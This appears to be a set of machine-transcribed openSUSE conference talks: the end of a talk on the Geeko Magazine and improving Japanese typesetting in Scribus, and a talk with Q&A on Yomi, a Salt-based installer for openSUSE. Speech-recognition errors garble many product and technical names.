line, there is a space between Japanese character and colon. So we don't need automatic space here. So the problem is the rule is not correct or well defined. So we defined a list of characters which need space around between CJK and Latin letters. And after that improvement, now we don't have implicit space between Japanese character and colon. So the patch is very simple like this. There is a giant if and so, or sign. So maybe, so condition indicating the range of characters and they are connected with or sign. So but sometimes I think what happens with K-lib letters? I mentioned there is adding space between Latin and CJK characters. So in this implementation, K-lib characters are not supported. So maybe we still need to extend the rule for more, so, longer support. So there are the problems not resolved. There are many, but I will introduce two. The first one is Japanese input from keyboard. Fortunately, Scribath does not work correctly with Scribath main window. So we cannot enter directly from keyboard. So I usually copy text from library or other editors. And the other one is timing of some Japanese type setting rules. For example, we sometimes turn on a spacing feature I mentioned, previous slide for writing so program code onto articles because if so Scribath is adding implicit spaces onto program code, the column not aligned every characters. So we still need my improvement. And I want to fix some bugs by the next issue of Kiko magazine. So the remaining time is limited. Let's conclude my talk. But yeah, yeah, the quickly answered questions. And I'm pretty asked for a question. So, will you translate to our Giko magazine into other languages? The answer is no by us. But we are planning to release our Giko magazine, so archive version of our Giko magazine under creative common license. So after that, maybe everyone can translate it, but they have to understand some Japanese. So here is summary of this talk. Giko magazine is written by Japan OpenSusus group and it's self-published technical magazine and so self-publishing of technical magazine, technical books in Japan is growing. So we are maybe so riding that way. And Scribath is a powerful open source desktop publishing applications and we have improved. It improves Scribath for better Japanese support for our Giko magazine. So thank you for listening. That's all. So, yeah. Two questions. I'm planning to release archive version of Scribath file, source of our Giko magazine in creative common license. But one problem is there's no compatibility between old and current Scribath file. So that's why we choose archive version. So I will convert all version, all Scribath file to new version. For the first question, so when? The combating is not finished. So yeah, I now cannot answer when. But yeah, if I make time, I will so combat it and as soon as possible, so I will release the combat version as soon as possible. We will talk. So articles are written in English. Yeah, maybe I will. So English articles onto something. So yeah, yeah, we are welcome to come in. Japanese. It's very much. I don't know either. Maybe people, so I think when the leader of Gikomagase can understand some English articles, I believe. So yeah, maybe English articles are all fine. That's an idea, which you may be writing. Maybe it will be interesting to let people who are not that know what to speak to know about the articles. Like the word for article is to make something more open so people know what to speak to and what to do. So it means for the people that speak, the people that speak, it's open for people to understand. I don't know, so you said you write about, you will write an interview with the publisher, but I don't know, let's say you wonder how to use OBS and anybody in the producer will know about it. So you could make a list of topics you don't know much about, so other people can ask you to write about it and you publish that interview. So we will send the talk of papers to the, not only to the managers, but to the managers. So maybe the topic that I'm appealing for the user. So yeah, maybe let's make a Gikomagase with kind of global community. Yeah, it's a nice idea, but maybe editing, so yeah, editor will be very busy, I think. But yeah, it's good idea to invite more, so contents from global community. Yeah. So. Hmm. Yeah. Yeah, I think next Gikomagase have a personified version. Yeah, there are these, so there's no stuffed version. I'm not sure how it will be because yeah, I don't have so draft cover work. How long does it take from the first draft to the final magazine to work? What's the timeline? Ah. So, about two weeks, two or three weeks. I need more than one week to make a page, so we're making a scripted state. So yeah. Right? Left or right? Yeah, yeah. So, scrimmage don't support vertical layout. And, Porticon Gikomagase, yeah, we usually use, so left to right. Because it's like scrimmage doesn't support it and you would have to use that right. Would you prefer your magazine from top to bottom? Yeah. So articles we usually use left to right because we use many, so English words. So, top to bottom, so pushing English letters, so top to bottom layout is really difficult. It can. I know one commercial magazine using vertical layout. Yeah, to me it's too difficult to edit, I think. I never thought about the Japanese and Japanese and Japanese, but I never thought about it. Yeah, that works for it. So, it's Japanese support is maybe best among open source applications, I think. But, so using that tip, we sometimes use magazine like layout, so putting images at the edge of pages. So we use corner pages. But using the tech, it's a bit difficult because we need to know, so type native commands. Yeah, it's a bit difficult. I don't know if you know that, but I think that people would like to make it at the end, more of a term for it. And you know, like the final style between changing the style of the photo. Yeah, many people in Japan, software writing, technical articles, use Ratek. I think it's a very serious problem, but I won't think that, because that opens the possibility to translate your magazine to other languages without writing. Yeah, so, yeah, we sort of set it with, so, but maybe so they have to adjust some layout. Thank you.
Japan openSUSE User Group publishes a technical magazine every half year. The title of the magazine is Geeko Magazine. It consists of technical articles on openSUSE and applications running on openSUSE. For example, the latest issue of the magazine contains articles like "Launching Kubernetes Cluster with Kubic in 10 minutes", "Accessing to Google Drive from openSUSE", and "How to enable HTTPS with Let's Encrypt." Since 2014, we have published 9 issues of Geeko Magazine. In this talk, after explaining the culture of self-publishing in Japan, I will talk about the process from calling articles from the user group until distributing Geeko Magazine. Another topic is our challenge: editing the magazine on openSUSE. Thereby, we cannot use popular desktop publishing (DTP) applications like Adobe InDesign. Instead of such applications, we have been using Scribus, an OSS DTP application to edit Geeko Magazine. It supports CMYK color and DTP data such as trim marks and bleed areas, required by print shops. However, in 2014, Scribus was not adequate for writing a Japanese document. This is because typesetting rules are much different from English etc. To publish Geeko Magazine, we went OSS way; we have improved Scribus one by one at every issue of the magazine in cooperation with the upstream community. I will talk about a brief summary of those problems we have resolved.
10.5446/54407 (DOI)
So, hi. So welcome and thank you for coming to my talk. So I am Alberto Planas, I am part of the SUSE team. We are going to talk today about Jomi. Jomi is the acronym of Jet One More Installer. If you know something about manga or anime, you know Dr. Sojomi is a kind of door that is connecting the world of life with the world of death. So we are going to try to cross this door in the other direction with Jomi. And basically we are going to talk about how to install Open SUSE using only sold stack. So you know that there is different ways, different technologies to install Open SUSE. We have auto-jast, jast, we have many others. But we are going to use today only sold. So how many of you know about sold? What is an... Perfect, this is going to be super fast. So what is Jomi? So it's a new type of installer. It's a... As today, I really hope that it's going to change. It's only focused for the Open SUSE family. So micro-S, SLEE, Tamil root of course, LEAP. It's designed to throw installations when you have a couple of heterogeneous nodes. So imagine that you have nodes that have a different CPU, different memory configuration, different hard disks. So when you have this kind of problem, Jomi is a good match for that. In that regard, it's an alternative to auto-jast because auto-jast have this capability. So it's designed to make the installation in an attended way. So it's a way to throw thousands of, well, hundreds of installations and be complete until the end without using intervention. For that, we need to use some kind of smart configuration file. In that case, we are using... Because salt is using Jamel, we are using Jamel together with some templating gene. In this case, it's JINJA2. There are other templating genes, but Jomi is using JINJA. One of the requirements is that it's a very good thing to have some kind of central point of decision. So some kind of compute node, some kind of orchestrator that is going to make decisions when something needs to be decided. Because it's built on top of salt, we want also the... In the potent, in the potent, in the potent, sorry. So this kind of feature that an estate have that when you apply something several times, the output is going to be the same in each case. And we want something that can work alone, but mostly can work integrate into a bigger solution. So that means that we want that installation. It's nothing special during the provision of the workflow of the provision of the client. So we want that the install is only one step and maybe it's not even the first one. As I said, it's an alternative to AutoJS, I mean, AutoJS is share this kind of goals. In that case, we are not going to use any specific library. So for example, in AutoJS, we have LibStory 10G and we have another set of ecosystems, a set of libraries that are explicitly designed for the installation process. Apart from that, they are not very used. So we want, in that case, have a very small chain of dependencies. So basically nothing apart from salt. So we are going to use the upstream salt models together with the new models that we are going to provide. Those models are going to live not in Jomi, but in upstream. So everything is going to be living in salt in this project. And of course, at the very low level, we are going to use the classic tools like Parted, CHroot, BatteryFed, or CIPR. But basically the CLI that you will use if you drive the installation manually, nothing else. And if you manage that, you are going to have a set of advantage. One of them is that, so if you know AutoJS, you have this XML that is a profile that you design specifically for certain compute, for certain nodes in your network. The good thing about using salt is that this configuration file that is kind of present in Jomi can be managed in a very DevOps way. So you are going to use the classical tool that DevOps is going to use, like Git, NFS, database, or whatever other mechanism to manage the configuration. And they are going to reapply all this knowledge and tool for the installation process, nothing specific. I think that another benefit that is going to have is less burden for the DevOps when he need to apply the knowledge during the monitoring, inspecting logs, understanding when something goes wrong, what is happening. Because we are going to use the classic tools and the logs files are going to be in the list that always are leaving and the format and the way to extend those configuration, sorry, those log files are exactly as salt or because we are using salt basically. So there is not a specific knowledge to understand what happened when something goes wrong during the installation process. Also, it's more easy to debug what is happening and fixing. So again, the use case is very clear. So we have a cluster, this cluster has different kind of nodes. They are going to have, we can imagine in OpenStack, in Cloud, in Kubernetes, that we are going to have different kind of roles. So there are certain nodes that are going to be used for the control plane. So maybe they have a very big CPU and a lot of memory. There are nodes that are going to have not so big hard disk. So they are not going to be used for storage but they are going to be used by the CPU. There are other compute nodes or other nodes that they have very long rack of hard disk and they are going to be used for storage. That means that the kind of file system that we are going to apply on then is going to be different. So we have this kind of different nodes. Yomi is going to help us to orchestrate the installation and decide what exactly is the better way to configure this node for the use case that we want. In that regard, we need some kind of intelligence for the installer. So we don't want to separate the making decisions from the installing process. So we need some kind of mechanism that we are going to provide with Yomi. So this is a one-on-one of Sol state because most of you know about Sol. This is going to be fast. But basically, a Sol state is a configuration, my name is Solvware. So it's kind of a chef of ansible, puppet or any other one that we have. Something cool about, I think it is a specific of Sol that is very modular and you can decide how you can make the architecture of your Sol solution. So you can have an optional master. You are going to have an optional minion installed in the node. You can use, if you don't have a minion, you can use SSH for the connection and taking control of the node. You can execute certain scripts and certain states locally without the master intervention and you are going to make the same decisions. You have different kind of modules that are called reactor, minors, Sol API that is going to help you to provide a very specific solution for the kind of network that you have. And this is something that is also be very critical for Yomi because it's expected and it's doing that it's going to work for this kind of configuration. So you can use Yomi in a masterless configuration. You are going to use Sol API to understand what is happening inside the installation process. You can use Sol SSH to boot the straps, some initial configuration. So you have all these kind of tools and configurations for resolving the programming of the installation process. Yeah, you know, Sol is using different concept. One is the grain that is the information local to the node. One specific that describes the properties of the node that you want to address. You have something that is pillars, that is basically some kind of data that is kind of, we can say that, well, you store some certificates or configurations or you store some kind of data that is going to be used later for making decisions. You have something that are the execution modules. This module is basically some action that is executed in the minion. It's anything. So for example, it's the installation of a package or mounting a hard disk. Everything that is an action is an execution module. User is writing in Python, so everything is there. On top of the execution module, you have the states. State is like an abstraction of the one or several execution modules. So it's like a chain of action. It's more complicated than that because it's going to provide you some guarantees about the execution model that is going to be launched when the state is applied. And we have some kind of states described in a Jamel documentation file that is a way to instruct the minion to execute a salt module. So it's a kind of a state module. The typical architecture in salt is something like that. So for one side, you have salt master. Inside the salt master, you are going to have this is basically a specific matching in your network. You are going to have the pillars, so the data that is going to be shared between the minions. You have the states. You have the state in the Jamel documentation, so some document that is going to be the Jamel. You have the state module, so the Python part that is going to implement the states. And you have the execution modules, so you have everything stored there. In the other side, you have different minions. Each minion is going to publish some data that is called the grains. So everyone is going to say, OK, my MAC address is that. My IP address is this one. My ID is that. I have this number of hard disks and this number of memory. This the minion is connected through the master via a bus. So you have a channel that you can use in different ways. So it's a resource that the programmer or the user of salt can use for different stuff. But this is the bus that is used for connecting the minions with the master. And basically, this is the full architecture. You can change every element from here, but we can start thinking about that. So again, PILAS is the data. We know exactly what is the data that is the Jamel document that is going to contain the data required by the states. So if you want to apply a state, you can read the data for a specific node via the PILAS. So you can read in the PILAS what parameters you are going to pass to the states. Something interesting is that those PILAS can be mapped on top of different nodes using a query language. So depending of some specific data that is living in the node, like the grains or some other features, you can map a subset of the data to this specific node. And it's a kind of data that contains logic. So optionally, this data can have different shapes according to some logic that is applied before you apply the state in a node. So it's more than raw data. This is an example of a PILAS. So something raw is in the gray box. It's a description. It's not really alike. In that case, it's the description of a file system. So in that case, it's only a description of an hypothetical two hard disk or one hard disk but two partition file system. There is nothing special in this description. I decide what is going to be there and I decide what data I am going to apply that. These data have only meaning for the state. So the state need to understand that. But as the person that decide what is going to be there, I can make different choices. And again, I can provide this bit of logic in the data. So in that case, in the yellow box, we can see that there is some kind of decisions based on something that is the ID that is living in the grains data. So depending of the kind of ID, we are going to expect one file system or another depending if it's a controller or a compute node. So you have an intuition about how this kind of template mechanism can change the shape of the data that you are going to apply into the nodes. You have a state. It's again this document, jambel document that is half this shape that is going to describe what do you want to apply and which data you want to apply to a specific node. So in the top box, you can see this create, mount create file system tab. So this is a way to mount a device. This is declarative. So you can see that you are not describing how to do that. You are describing what do you want to have. The state is going to take care that if the mount point is not there, he can create that. So it can create the directory empty if it's not there. If the hard disk is not present, it's going to show an error message. If the file system is not the one that you have, it's also going to fail. And let's say that there is a lot of logic, a lot of intelligence behind this declaration. You can have below in the KX section, you can have very low level description. In that case, it's not so nice like the first one because you are executing, in that case, KX. And this is a full parameter. So you are calling KX with a full parameter, a full list of parameters that are going to send to the to the Minion. You have one word that is only if. So you have a mechanism to apply to the site. If this state can be applied or not. But you can have more intelligence in the state. In the right side, you can see that depending of the pillars, certain parameters are going to change. For example, in that case, we are going to inject one extra parameter, FAT, in case that the file system is FAT and you are providing some specific flag for this state. So you have different ways of different levels of abstractions about how to apply the states. Internally, an state is a very complicated beast. Usually you start validating the input. After that, you make a plan of the actions that you need to do in order to fulfill the goal of the state. Sometimes you don't need to do anything because you are really in the final state or stage of the state. So nothing can be done. You also have a test flag that is going to report you if you activate this flag. It's going to report you okay. I expect that I'm going to do this action and this action. I'm going to change that. So you can inspect what is going to happen before executing or applying the state. Something very cool is that at the end when he applied the change, recalculate again the action that needs to be done and compare the difference between the current action after applying the change and the expectation that he has. And if he finds a mismatch, it's going to report that something, I make some change but the state is not the one that I was expecting. So even if something goes wrong at the end, you are going to understand what change was applied and what element of comparison fails. If all the logic inside here goes properly, the state has a very nice property that is potentially he can fix wrong configurations. Because this is a planning and a checking, if something goes wrong in an old state, the planning will fix the broken configuration. That is always the case but it's a feature that is sometimes present. So I have a small demo. The demo is a two-note installation. Both nodes are going to be different. One of them is going to be a BIOS with a single hard disk. I want to use a swap and I want to have a group partition so you know that in legacy configuration you need to have a very small partition at the beginning to make room for group. We are going to exercise this requirement. Also the file system is going to be better first and I want to use this subvolume configuration that we have in OpenSUSE and home is going to be part of the, like this today, is going to be part of the subvolume. In the other node I'm going to use UEFI, it's a secure boot, disabled machine so security boot is going to be there but it's going to be false. It's two hard disks, one UEFI, partitions, swap, LBM, so I want to use LBM between both hard disks. I want for the root I want to use battery fast but for home like in previous OpenSUSE I want to use extra fast. So it's kind of a different configuration. So what I did here is let me show you that. All the code by the way, this demo is a small script that is living in my GitHub, a plan as a Jomie demo. The dependencies are zero, it's only one script that is living there. That one is executed, so this one is executed, you're going to have two VMs. Those VMs that you see here are booted using a Juse base image. It's a normal and classical live Juse image. Inside there we have the Soled Minion and this Soled Minion is not exactly the upstream one, it's the one that I use for the develop. So it's the Soled Minion together with a very big patch that contains the change that I upstream for Jomie in Soled. Everything that is in this patch is merged but not in the release branch but in the develop branch. So you can see in the terminal here in the big black one that I can do a ping. So what I am pinging is the Minion that is living in the live, so not the one that is living in the node. I'm going to apply the high state here. So what we are going to do now is apply the high state. Basically a high state is like the top configuration from my tree of states. It's a bit hard to explain but basically it's like, okay, I apply all the states that you want to apply for these nodes. There is an asterisk here that means apply for every node that you can find. In that case, we have only two. There is another terminal that is executing some monitor. So this monitor is a small application that I write that is going to read this buffer, sorry this bus that we saw in the architecture diagram. We are going to read from there every event that is happening there. So let's apply that. Basically you are not going to see anything here but if everything goes okay, you are going to start seeing some of these logs with different colors for each machine. In the right side, yes, in the right side you are going to see the state that is going to be applied here. What is happening in detail there. So let's go back to the presentation. This is going to be slow because it's going to download all the package. So this is the real thing that is happening. And let's go back to the presentation. So later we are going to visit the demo again. So what is Jomi exactly? Jomi is only a composition of those sold states. It's nothing more. It's a composition of ordering of those sold states. So each granular element in Jomi is a normal and straightforward sold state. The logic or the complexity in Jomi is how we orchestrate those states. So how we put that those states in order. In such a way that we are going to guarantee that the proper and the correct state is applied depending on the configuration that you want. So in that regard, because Jomi is a sold state, it's a composition of sold state that makes Jomi itself an state. And that means that Jomi can be applied several times without breaking your configuration, without breaking your installation. It's going to take care of understanding in which point the configuration fail and continue for that if the installation was not complete. And they take very early that the installation was done, was done successfully, and nothing needs to be done after that. So this is like a high level abstraction tree of, it's not a tree, it's three layers of abstraction. So Jomi is a sold document, it's a SLS document without logic, I mean without many details of low level stuff. And all the actions are in the sold stack layer. So in execution models on the states, that means that every time that Jomi needs some new feature, some new capabilities, that is not possible to be expressed in a sold state of its, it can be possible to be expressed as a state, it's going to be very complicated. A new feature is going to appear in upstream. So the state is going to take care of this new capability, or the execution model is going to take care of this flag or whatever. So we can see that Jomi is a very small and thin layer on top of sold. Internally Jomi is a tree. So all the logic called the complexity of Jomi is inside these three shape of states. So the root of the, or Jomi is the installer, and the first sub tree that is going to be executed is the storage sub tree. And this sub tree is going to be divided again, other sub tree like the partitioning, rate configuration, volumes, sub volumes, and other key elements that is related to storage. If one sub tree is over, there is another sub tree that is going to take care of the software. So registering the repo, installing the package, and taking care of the the sroot. In order to make sure that all the the new software is living in the proper place. After that we have another sub tree for users. Another big one for the bootloader is going to take care of configuring the bootloader. If a snapper is required, taking care that the snapper is properly configured with the, in such a way that Grapp is going to show you this menu to recover from all the other snapshots. You have some kind of cleaning or post install actions that need to be done once that the software is present, once that the user and the service are there. And later the last one is the reboot or KX execution. I tried to plot the tree in the right side. This is only a small part of the tree. I'm a bit old now, so the current is a bit more complicated. But with this shape we are able to extend properly the actions that are missing for a specific installation. So this sub tree or this tree is only covering the basic stuff. If you want to make more complicated configurations during the installation, there are mechanisms to inject your branch in this tree and extend the installer without changing the source code for anything. One lesson that I learned is that composability in saw is a bit tricky. We can discuss the why is tricky, but it's very obvious. Composing this saw state that are going to play nice together, so when the end of one state is going to be the precondition of the next state, maintaining this requirement is a bit tricky. Basically, there are some units problems, some preconditions are not met by the postcondition of the previous state. Some exit conditions are not taking care of the actions are not real, fails are expectations, sometimes. So these kind of elements need to be fixed upstream. And part of my job is that all those elements are properly addressed upstream. Jomi can work alone. I mean, you can, something very cool that I did for this project is that inject some kind of mechanism based on macros. So it's kind of transparent for the user and from the developer of Jomi. Some kind of macros that are going to inject certain events in this bus. So it's very easy to inspect what is happening in real time. So this previous monitor tool was showing in real time what is happening. And basically, this macro system is easy to extend and easy to, you can disable that. So it's somehow making a bit dirty the output of the installer is something that you can disable if you want. But you have a way to control using Sault API, the installation process and monitor it. So it's a way to make sure that Jomi can work isolate of the installation process, but of course, can work together with the rest of the system. So what is the current state? So let me see. Something that we did at the very early of the project is define a minimal be able product. The MVPs is still ongoing. We are not so far to finish, but we agree that we are going to end this first iteration once that open source in micro s and SLEAD are in shape. So that means that certain elements are going to be outside the initial scope of Jomi. So if you have a very fancy network configuration, very exotic devices, this is something that you can address, but only using Sault and only using the extension mechanism that Sault provide for you for the installer. What is done? So for storage, it's pretty nice. So we have GPU, BIOS partitions. We have a way to make very explicit partition schema. So you can use the pillars to be very precise of the kind of partition that you expect for certain, for your notes. So if you want to use better effects in two or three partitions, you can do that. LBN, RAID, this is done. Something that they have in place is something very cool that is a small partition. Very similar to the one that provides just, but using a linear programming. So you have this optimization algorithm that if you provide some constraint, it's going to return a solution of those constraints. And you can express the partition problem as a set of constraints. So this is a very nice way to have a very deterministic and reliable way of making decisions about sizes and maybe sizes. So this is, I have a small, there is a three, four slides at the end. If we have time, we can see this algorithm. If not, it's okay. FEWF, FAT1632 is there, it's in place. So you can configure fancy UEFI partitions. X2, X3, WAP, but the first sub volume, RAID only, copyright, Snapchops is there. So Snapchops is a very nice tool that is going to affect, because it's kind of orthogonal, but it's going to affect not only how you are going to partition, but how you are going to configure certain bit of software that is very far from the storage. So Snapchops is completely support. You have RAID there over devices and over partitions. This is also very tricky to do, because RAID can live on top of raw disks, but if you decide you can have a pre-partition write and partition again over the write. So this is supported. You have LBM, you have UEFI and secure boot available, you have Group 2, you have the Snapchops software, it's already there, users, a basic SIS config integration. Something very cool is that you have a full control of a CH route. So that means that you have a mechanism now in place in sold upstream. It's in develop, not in the release product. To make a full control of your CH route, so you can isolate your CH route, execute any random Python sold state inside this CH route, and this state is not going to be able to see outside the CH route. You can, there is a very nice free state that is going to guarantee that you can revert certain installations. So sometimes if you are using CH route, maybe you need some kind of software, but you don't want that software is going to be present at the end of the installation. You have this free state that is going to guarantee that the amount of software that is going to be living in the final stage of the installation is exactly the one that you require. And key exit and reboot is in place. SELT API integration, monitoring is there, sold the ordering of the state, so you have a way to require certain states and guarantee that this tree that we saw in the previous slide is going to be executed in the proper place and you have a mechanism to inject your own state inside the tree. What is missing? I mean, JAS is a very old product. It has a very long set of features. So going in the same level that JAS is not released is complicated. So LACS or LUKE is not there, so no encryption. Because an LBM class is part of the MVP, but it's not present. Resize. Resize is an extremely tricky thing to do when you are in an attended installation process, so you don't have the possibility that the user is going to inject feedback. So making decisions about what to resize and if it's okay to resize, it's going to be tricky. But it's something that we are going to take care. Basic network configuration. This is a chain. The network configuration in upstream for SUSE is not in right shape. We are going to fix that in upstream. We are going to have that in the final version of JOMI. We expect to have some basic control XML import, so you know that if you know JAS, you have a skill CD control XML file that is explaining some constraints and restrictions over the installation, so we want some kind of importing this file into your JOMI installation in order to have an equivalent installation for each product. How to just convert it. Multi-architecture is missing. And something that is ongoing for a very long time and it's my fault that it's not there. The OpenQA integration. But it's going to be there. You want to follow JOMI. You can, JOMI is an open SUSE project. Go to the open SUSE and it's playing GitHub. Find it there. You are going to be very surprised. I hope so. How slim, how small data is there. It's only a bunch of SLS documents, Jamel, some example of pillars, not much, but nothing else is needed. Because the real meat is living upstream. So if you go to myOBS, you are going to find the version of salt that I'm using. You are going to find there a very big patch on top of our version of salt. And this is where the meat of JOMI is living. And the good news is that it's already in the double version of salt. I have time, I think. Yeah, give me one minute. One minute and we can go to the question. So I want to talk about this linear programming thingy because I think that is super cool. So as I told you, making decisions in a reliable way about partitioning is not easy. It's not trivial. So if you saw what other guys are doing, you can see that there is a kind of logic in there, but it's very ad hoc. Sometimes it's not very clear. The rules that finally the software is using to make decisions about the partition. And not always, and in the case of partitioning, it's a very good example, not always, the rules are hard. There are certain points that the rule is extremely hard, so you can have a very small swap partition if you are expecting to froze your machine in those swap. So sometimes the rule is hard, but sometimes the rule is not very hard. So you have some room, some shadow room to move the limits of your decisions. So my proposal here is to use linear programming and express the problem of partitioning hard disk as a set of constraints. Constraints that are, some of those constraints are more hard than others. So for example, in this yellow box, we can see a set of constraints. So obviously the sum of all your partition needs to be less or equal to the amount of space that you have in your hard disk. And this is a hard rule, but not so hard because you can have some free space, but you can never have more space in the partition that the hard disk is available to provide. The hard partition needs to be between some limits. So there is a minimum expectation and maximum expectation. Again, this is not a very hard rule. So the root partition can be sometimes bigger than the one that you put in the max size. And why this is the case? Imagine that you have a really partitioned hard disk and the root is there, but it's a bit more big than the one that you have expressed in your control XML. So if you don't, if you avoid the resize and you meet this criteria, that is at least is bigger than the minimum, maybe it's not so bad to simply not take the decision of resizing or removing and recreating the root partition based on other constraints. Same for swap and home. So you can see that there is a set of logical constraints. So you have an objective function. A linear programming has these constraint and objective functions. And the goal is to minimize the objective function. So you have a function that is based on penalization. It's going to try to minimize the amount of penalization that you are going to meet if you violate some of those constraints. So you can see that if you make the decision of resize some present partition, if you make the decision of not meet the criteria of range for a partition of if you make the decision of weight some space, you are going to have penalization, but it's going to be different for each constraint. So the linear programming thing is going to resolve those constraints that provide you a solution. And the good thing is that this solution is always going to be the same. And it's very easy to understand why the algorithm is giving you this solution. And the final objective function is going to explain why those constraints are not possible to meet in some case. So if something goes wrong, you are going to see very easily why those constraints cannot meet and why it's better to resolve the hardware problem instead of continuing the installation. So this is basically what I want to say. And we can see here, this is the monitor tool that I was talking about. So you can see here a lot of states. We can see that those states are so far green and the output of salt is that it executes three, 16 states. Everything succeeds. Something interesting is that the state executing in both nodes are completely different because we make different decisions in both nodes. But we did that with a single command. So they take care of making decisions on, OK, this state makes sense in this node because this pillar and this grains. And we have two VMs here that are available with the user that I create for this matching. So we can see here that in that case we have one hard disk, three partitions. And if I find my place, we can see a different layout here. In that case, we have LBMs. And on top of LBM, we have swap root home and we have two partitions outside. One is a FEPartition and the other one is the part of LBM. So yes, that's my demo, my presentation, and if there are questions. So my first question is about the transactional updates because I know that Salt doesn't support yet the micro OS system, right? Yes, micro is supported. So fully supported. So it's working. Transaction data are there. So you are going to install micro. I mean, what I was doing these my last two weeks is do a full cubic orchestration. Full cubic orchestration. And one of the steps of a full cubic orchestration is installing micro. It's the first step. After that you need to reboot, execute, Google ADM and join the nodes and all the things that is for Kubernetes. This is properly installed with transactional update. In the same way that JAS is doing, that is the canonical way of doing micro installation. Yes. Also the post configuration of this node, that's also work with transactional updates. Yes. So yes, this is a good question. I mean, the post configuration is, there are several ways of understand post configuration. You have your node with a salt minion. This salt minion come from a live CD or Pixie boot, whatever way mechanism that you want to inject this salt minion and it's going to be executed in the memory of the node. It's okay. You have tons of state that are going to change the hard disk that is physically there and it's going to install all the software. But not everything ends there. This is a stage that is post installed. This post installed is going to take care of enable and disable service that the user decides, not the package. The user decides what state, because with system D and CX root, it's possible to enable and disable states. It's possible to configure the network. It's possible to go very far with CX root, of course. It's possible to go very far with an already installed system that you are not booting from there. So technically you can inject the database. If you have a database binary, you can inject that. You can synchronize a lot of information that is going to be ready for the first boot. Not always possible to do after the initial installation. For example, if you are using PostgreSQL, you are going to need, of course, the progress service there, so you need to reboot. But all the small details or all the elements that you can advance before the first key exit or reboot is part of this workflow. Yes. And do I need to specify something special on the state to specify that I'm going to install a package? Yes. Part of my job was to provide a root field inside the state. If you provide that and provide a valid CX root path, this state is going to be executed in the CX root environment. This is working for users, package. This is working for system D. And for any random state that you can apply, if you put that on top of another state that is CX root, so you can think about any random state that you want to be executed inside CX root, and you can do that. You can reverse that, and this is going to be executed there. Yes. Another question is about how does the master communicate with the target system if they don't have any operating system yet running? How are you communicating to install the system? Right. Maybe I was not clear, but you need to inject in the node a salt minion. In that case, in my example, you take a live ISO image and you boot from there. This image contains the salt minion and very small configuration and a small minion ID configuration and small auto sign mechanisms to set the certificate. In this example, it's not there, but in the example of micro s is there. In the installation image, you can inject again a new salt minion that is going to take over when you reboot. Because it's salt and you can do crazy stuff, you can take the certificate of the current salt minion that the salt master is now able to recognize and inject in the new image. The next time that the image reboot, the minion is going to be there. Master is going to acknowledge the minion and everything goes smooth. Then you say that you can control which packages are going to get started later. You can also configure with Jomi that you have a minimal system. This is the base pattern, for micro s, you install the three patterns that are expected to be there, whatever you want. What is the shape of that? I have a small emacs open here. This is the shape of a salt pillar. You can see that for this example, there is a section, there is software. In software, there is a repository entry and a package entry. In that case, it's very clear what is going to happen. This repo URL is going to be registered inside the CS route and only this pattern and this kernel is going to be installed, nothing else. You want something more, change the pillar and that's all. My last question is about you say that it's not multi-architecture support yet, only x86 there. Yes. I mean, I don't see any problem, but Grapp needs some tweaks depending on the architecture that you are in. The requirements are a bit different. The logic is in place. Room for this state, but it's not there yet. Thank you. Hello. I would like to ask if there is a forward verification. I mean, if I have a code of integration for example, there is a free to format to swap and there's nothing like this partition. Let's show me immediately when I start the process or in the process. Yes and no. I mean, this is the failed logic of salt. So the state, you're using a command to the state. In that case, it's create the swap partition. It's what's not possible to create, you have two options. Continue with the next state or fail there. Depending on how you configure the salt master, you have a hard fail and you can decide on stop here. If you don't have swap, there is no chance of doing anything else. Because I want to break frequently my state and I want to make sure that I can recover from my breakage. I want to continue. So in this example, salt master was taking the decision of continue with the state in production. It's expected that this is not going to happen. There is going to be a hard fail. And you can do that by state. So certain fails or certain states are okay, but not for others. So you can put this flag in the state that you think that continue can be helpful. Because maybe the broken edge is not so hard. You are going to have a boot system that you can adapt later. So you can take both decisions. Okay. And second, little bit tricky. What's the difference between unsolvable and salt? A lot. I mean, sorry about that. Yeah. I mean, with Ansible, you have this master. I mean, you don't have minions. So you have SSH. That means that if you have the certificate recognized in both sides, you have an open channel that you can send commands. In Ansible, there is not a concept of state. It is a set of logic steps that are going to guarantee that the final result is there or not. And there are some mechanisms, standard mechanisms, to validate that. So in states of guarantee, in Ansible, it's more like a list of execution models in salt. It's actions that are done there. And depending on the quality of the action, some of them are able to understand that something fails and is not even potent. I mean, sorry, an easy, indem-indem-ponent. I don't know how to say that properly in English. But in Ansible, it's not strange. It's frequent that when you apply a state several times, or sorry, an action several times, you are breaking more the code you know. So there's not kind of logic. So yeah. Yeah, maybe two additional comments. First of all, because normally the logic is running on the node itself, in this case in RAM, but it could also be in the running system. That's why it's so much faster, because there's almost no computation. So all the decisions, oh, you should do five partitions because the pillar says you should SDA one, two, three. All that is already rendered on a client. So you have a lot of compute power. If you have 100 machines installed, you have 100 times your number of CPUs that do all the computation. And the server is really just a dump file server that serves you all those config files and a message bus that says do this. And it's just this one command, salt, asterisk, apply high state that is sent over the bus in a broadcast and everyone is listening. Oh, it's an asterisk. So it's for everyone. Or oh, it's mentioning my exact host name or a certain grain I have. Like every four CPU server should do this or every server that has SUSE installed. And that makes it so much more efficient. It's also because you have a minion running and there's a concept of things like beacons, which are basically watch stocks you can configure. You can send events back to the server at any time. Ansible can only talk to the machine when it's talking to the machine. That's the main difference. And then of course, for that scenario, we are using kind of an older version of that approach for retail, for example, for our point of service. You can pixie boot a machine and ask it to say, oh, I'm now in a state where you can deploy me. This is the key I want you to accept. With Ansible, you would not be able to do that. You would have to build something else that actually checks, oh, the machine is there so I can SSH into the machine because the machine cannot talk to the server as long as there's no connection established. Salt does this. So salt, a minion comes up. It knows, oh, I have to talk to the master that's called mymaster.susa.org. And it will try to talk to that master and tell, oh, this is my key. Can you please accept that key? And then you can either have this pre-accepted in a wide list or you can go actually ask the guy who booted the machine, OK, can you please check on the screen whether that's the right key? You know, that's kind of the benefit. Well, I have two questions. What is more like from the user point of view? And the other is about implementation which probably is going to become kind of a two long discussions that will give the world for the first one, first of you, about being in them potent or where it is pronounced. And that's something we don't have in Autoyast. But sometimes I'm not pretty sure if you already have some machines. And for example, we sometimes specify in our Autoyast profiles that we want a new partition for data or whatever, but we really want it to be new. So we have flags about keeping partition that are found or recreate them and also about the file system. So but we see in them in the potent whatever approach, it may be that you decide to reuse something that is there. And that's not always what we wanted, even if it looks like our final partition, same size, same location, we may really want to reformat it just because we want. So I would like to see some example of how that can be achieved. Yeah, I mean, yeah, sorry, this is a very good question. I mean, there are a lot of level of explaining what is happening. The potent is a word, but let me try to address every level. A word we cannot pronounce. Yeah, funny pronunciation. So what you have a mechanism of doing the right thing in the right place. For exactly the use case that you are telling me, I implemented a flag. So there is a very easy way to see if 